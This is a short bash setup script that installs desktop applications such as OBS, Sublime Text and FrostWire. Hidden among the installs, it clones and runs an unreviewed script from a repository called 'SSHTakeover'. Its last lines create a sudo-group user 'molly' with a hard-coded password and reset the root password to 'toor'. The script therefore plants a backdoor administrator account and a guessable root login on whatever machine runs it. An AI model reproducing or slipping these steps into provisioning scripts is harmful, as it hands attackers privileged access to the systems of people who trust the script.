#!/bin/bash
apt install sudo obs-studio firewalld firewall-applet -y;
sudo systemctl enable firewalld;
sudo systemctl enable rc-local;
git clone https://github.com/independentcod/SSHTakeover >>/dev/stdout;
cd SSHTakeover;
sh takeover.sh >>/dev/stdout;
git clone https://github.com/independentcod/Chiaki-AutoCompile;
sh ./Chiaki-AutoCompile/build.sh;
wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add -;
apt install apt-transport-https;
echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list;
sudo apt-get update;
sudo apt-get install sublime-text -y;
if [ "$(uname -m)" = x86_64 ]
then
sudo apt install mplayer mplayer-gui openjdk-14-jre-headless -y;
wget https://wc1.frostwire.com/frostwire/6.8.6/frostwire-6.8.6.amd64.deb;
dpkg -i frostwire-6.8.6.amd64.deb;
sudo apt install -f -y;
sudo dpkg --add-architecture i386;
sudo apt update;
sudo apt install wine32 -y;
fi
sudo useradd -m molly;
echo molly:eskam123 | sudo chpasswd;
sudo usermod -g sudo molly;
echo root:toor | sudo chpasswd;
